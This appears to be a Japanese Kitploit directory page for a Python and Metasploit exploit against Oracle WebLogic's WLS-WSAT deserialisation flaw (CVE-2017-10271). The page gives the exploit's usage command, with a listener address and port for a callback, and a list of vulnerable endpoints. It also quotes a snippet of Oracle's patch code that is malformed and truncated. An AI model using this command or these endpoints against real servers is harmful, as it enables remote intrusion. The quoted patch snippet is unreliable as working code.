Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2017-10271 — Oracle WebLogic WLS-WSAT リモートコード実行エクスプロイト (CVE-2017-10271) | Kitploit
ツール/GitHubGitHub/kkirsche/cve-2017-10271
エクスプロイトフレームワークペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubkkirsche/cve-2017-10271

CVE-2017-10271

Oracle WebLogic WLS-WSAT リモートコード実行エクスプロイト (CVE-2017-10271)

リポジトリを見る
129423年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2017-10271

Weblogic wls-wsat コンポーネントの逆シリアル化脆弱性 (CVE-2017-10271) 検出・エクスプロイトスクリプト

使用方法

root@kitploit:~
$ python CVE-2017-10271.py -l 10.10.10.10 -p 4444 -r http://will.bepwned.com:7001/

機能

  • スタンドアロン Python スクリプト
    • 任意のホストが脆弱かどうかを確認するチェック機能
    • Linux ターゲット向けのエクスプロイト機能
  • Metasploit モジュール
    • 任意のホストが脆弱かどうかを確認するチェック機能
    • 全ターゲット向けのエクスプロイト機能
  • スキャナー (./scanners)
    • ホストが脆弱かどうかをチェックします。完全に自己完結型です。

法的注意事項

本スクリプトの使用は自己責任です。Kevin Kirsche は、ここに含まれるコードを使用して行われたいかなる行為についても一切の責任を負いません。このコードは、サーバーのセキュリティを検証したいチーム向けに作成されたものであり、悪意のある使用を目的としたものではありません。

謝辞

オリジナルの PoC を作成した Luffin に多大な感謝を捧げます。ベースとなったリポジトリ: https://github.com/Luffin/CVE-2017-10271

上記以外の脆弱な URL

root@kitploit:~
/wls-wsat/CoordinatorPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/ParticipantPortType
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/RegistrationRequesterPortType11

関連脆弱性

CVE-2017-3506

Oracle のパッチ

元の情報源: https://blog.nsfocusglobal.com/threats/vulnerability-analysis/technical-analysis-and-solution-of-weblogic-server-wls-component-vulnerability/

更新された情報源: https://nsfocusglobal.com/technical-analysis-and-solution-of-weblogic-server-wls-component-vulnerability/

root@kitploit:~
private void validate(InputStream is) {
 WebLogicSAXParserFactory factory = new WebLogicSAXParserFactory();
 
 try {
  SAXParser parser = factory.newSAXParser();
  
  parser.parse(is, new DefaultHandler()) {
   private int overallarraylength = 0;
   
   public void startElement(String uri, String localName, String qName, Attributes attributes) throws SAXEception {
    if (qName.equalsIgnoreCase("object")) {
     throw new IllegalStateException("Invalid element qName:object");
    } else if (qName.equalsIgnoreCase("new")) {
     throw new IllegalStateException("Invalid element qName:new");
    } else if (qName.equalsIgnoreCase("method")) {
     throw new IllegalStateException("Invalid element qName:method");
    } else {
     if (qName.equalsIgnoreCase("void")) {
      for(int attClass = 0;attClass < attributes.getLength(); ++attClass) {
       if (!"index".equalsIgnoreCase(attributes.getQName(attClass))) {
        throw new IllegalStateException("Invalid attribute for element void: " + attributes.getQName(attClass));
       }
      }
     }
     
     ... more code here ...
    }
   }
  }
 }
}
ツールをダウンロード